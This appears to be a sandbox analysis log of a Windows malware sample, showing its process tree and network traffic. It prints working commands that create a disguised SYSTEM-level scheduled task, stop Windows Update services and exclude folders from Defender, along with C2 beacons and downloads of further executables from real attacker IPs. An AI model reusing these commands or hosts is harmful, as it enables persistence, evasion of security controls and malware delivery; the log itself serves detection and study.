"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:3408

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4768
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:2144
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:3224
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4264
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2024

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:3820

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4624
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1648
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4240
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3748
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:732
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:800
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1444
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1100
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:2200

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4620
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:3948
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4168
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4216
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3580

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:3292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:1348

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:4432

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:4116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2300

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:416
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1512
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4768
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:2752
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID:4756
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4412

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:732
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:644

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:4012

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3776

Network

DNS

135.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

135.121.18.2.in-addr.arpa

IN PTR

Response

135.121.18.2.in-addr.arpa

IN PTR

a2-18-121-135deploystaticakamaitechnologiescom
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ktsumaeudn.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:23:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kxyjr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 217
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:23:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dtnqmly.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eevbmxgjam.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 347
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 54
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bvmama.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 144
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fshgojl.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 229
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dyxuahn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 185
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://akneb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 198
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gaowerhe.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 281
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nxgqffa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 363
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 10 Sep 2023 22:24:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://77.91.68.78/lend/xk555wjbvnhf3f.exe

Remote address:

77.91.68.78:80

Request

GET /lend/xk555wjbvnhf3f.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Sun, 10 Sep 2023 22:24:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 13:27:24 GMT
ETag: "13ae00-605012b94d35a"
Accept-Ranges: bytes
Content-Length: 1289728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/lend/build.exe

Remote address:

77.91.68.78:80

Request

GET /lend/build.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Sun, 10 Sep 2023 22:24:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 15:00:11 GMT
ETag: "55600-6050277656643"
Accept-Ranges: bytes
Content-Length: 349696
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://79.137.192.18/rockas.exe

Remote address:

79.137.192.18:80

Request

GET /rockas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 79.137.192.18

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:28 GMT
Content-Type: application/octet-stream
Content-Length: 202752
Last-Modified: Thu, 31 Aug 2023 18:02:49 GMT
Connection: keep-alive
ETag: "64f0d5c9-31800"
Accept-Ranges: bytes
DNS

78.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.68.91.77.in-addr.arpa

IN PTR

Response

78.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

18.192.137.79.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.192.137.79.in-addr.arpa

IN PTR

Response

18.192.137.79.in-addr.arpa

IN PTR

VPS-2059lethostnetwork
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.65.80/ss41.exe

oneetx.exe

Remote address:

5.42.65.80:80

Request

GET /ss41.exe HTTP/1.1
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:31 GMT
Content-Type: application/octet-stream
Content-Length: 606728
Last-Modified: Sun, 10 Sep 2023 19:14:33 GMT
Connection: keep-alive
ETag: "64fe1599-94208"
Accept-Ranges: bytes
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.65.80/toolspub2.exe

oneetx.exe

Remote address:

5.42.65.80:80

Request

GET /toolspub2.exe HTTP/1.1
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:37 GMT
Content-Type: application/octet-stream
Content-Length: 254464
Last-Modified: Sat, 09 Sep 2023 20:17:20 GMT
Connection: keep-alive
ETag: "64fcd2d0-3e200"
Accept-Ranges: bytes
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.65.80/31839b57a4f11171d6abc8bbc4451ee4.exe

oneetx.exe

Remote address:

5.42.65.80:80

Request

GET /31839b57a4f11171d6abc8bbc4451ee4.exe HTTP/1.1
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:42 GMT
Content-Type: application/octet-stream
Content-Length: 4482440
Last-Modified: Sat, 09 Sep 2023 20:17:27 GMT
Connection: keep-alive
ETag: "64fcd2d7-446588"
Accept-Ranges: bytes
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

z.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

z.nnnaajjjgc.com

IN A

Response

z.nnnaajjjgc.com

IN A

156.236.72.121
DNS

91.179.33.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.179.33.162.in-addr.arpa

IN PTR

Response
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

85.9.123.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.9.123.176.in-addr.arpa

IN PTR

Response
GET

https://z.nnnaajjjgc.com/sts/imagd.jpg

ss41.exe

Remote address:

156.236.72.121:443

Request

GET /sts/imagd.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: z.nnnaajjjgc.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:36 GMT
Content-Type: image/jpeg
Content-Length: 1507532
Last-Modified: Thu, 07 Sep 2023 13:47:29 GMT
Connection: keep-alive
ETag: "64f9d471-1700cc"
Accept-Ranges: bytes
GET

http://95.214.27.254/getfile/taskhost.exe

oneetx.exe

Remote address:

95.214.27.254:80

Request

GET /getfile/taskhost.exe HTTP/1.1
Host: 95.214.27.254

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:32 GMT
Content-Type: application/octet-stream
Content-Length: 1083904
Last-Modified: Sun, 10 Sep 2023 22:20:08 GMT
Connection: keep-alive
ETag: "64fe4118-108a00"
Accept-Ranges: bytes
GET

http://95.214.27.254/getfile/winlog.exe

oneetx.exe

Remote address:

95.214.27.254:80

Request

GET /getfile/winlog.exe HTTP/1.1
Host: 95.214.27.254

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:33 GMT
Content-Type: application/octet-stream
Content-Length: 2677032
Last-Modified: Fri, 08 Sep 2023 11:02:48 GMT
Connection: keep-alive
ETag: "64faff58-28d928"
Accept-Ranges: bytes
GET

http://95.214.27.254/getfile/msedge.exe

oneetx.exe

Remote address:

95.214.27.254:80

Request

GET /getfile/msedge.exe HTTP/1.1
Host: 95.214.27.254

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:35 GMT
Content-Type: application/octet-stream
Content-Length: 7330304
Last-Modified: Fri, 08 Sep 2023 11:06:34 GMT
Connection: keep-alive
ETag: "64fb003a-6fda00"
Accept-Ranges: bytes
DNS

api.ip.sb

sc.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31
GET

https://api.ip.sb/ip

sc.exe

Remote address:

172.67.75.172:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 10 Sep 2023 22:24:32 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hnC2d5evXEWy7NAO9FphFFcrfMWq4Rx1oXE45i1fBr9vaTfl%2BQdcxgRbToNhyQ49SMUan3QXN43hh2lqowsiL9RsIOCsMsw7npbuSBhIJw81ifzF3bwOxCuIsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 804b14ec9cc10e4c-AMS
alt-svc: h3=":443"; ma=86400
DNS

254.27.214.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.27.214.95.in-addr.arpa

IN PTR

Response
DNS

